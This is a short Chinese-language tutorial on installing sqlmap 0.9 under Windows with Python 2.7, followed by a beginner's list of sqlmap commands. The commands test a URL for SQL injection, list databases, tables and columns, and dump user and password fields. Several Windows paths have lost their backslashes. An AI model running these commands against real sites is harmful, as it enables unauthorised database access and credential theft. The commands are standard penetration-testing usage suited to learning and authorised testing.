Windows下SQLmap的安装与入门


安装SQLmap:

1.下载SQLmap;

2.下载Windows版Python2.7(注,Python3.X会报错);

3.安装Python2.7,记住安装路径,我的是D:Python27;

4.解压sqlmap-0.9.zip,将sqlmap-0.9目录下的sqlmap目录拷贝到安装python目录下;

5.进入到D:Python27sqlmap目录下,右键点击sqlmap.py发送到桌面快捷方式;

6.将快捷方式重命名为sqlmap,然后右键属性—在目标栏输入:“%windir%system32cmd.exe”;

7.创建好之后,运行sqlmap快捷方式,这样就可以在Windows运行sqlmap了。


SQLmap入门:

注,URL代表网址,DATABASE代表数据库名,TABLE代表表名,USER和PASSWORD代表字段;

检查是否有注入漏洞:

sqlmap.py -u "URL"

获取数据库:

sqlmap.py -u "URL" --dbs

获取数据库中的表:

sqlmap.py -u "URL" -D DATABASE --tables

获取数据表中的字段:

sqlmap.py -u "URL" -D DATABASE -T TABLE --columns

获取数据库中的数据:

sqlmap.py -u "URL" -D DATABASE -T TABLE -C USER,PASSWORD --dump

© 红鸟PHP  Powered by hncms!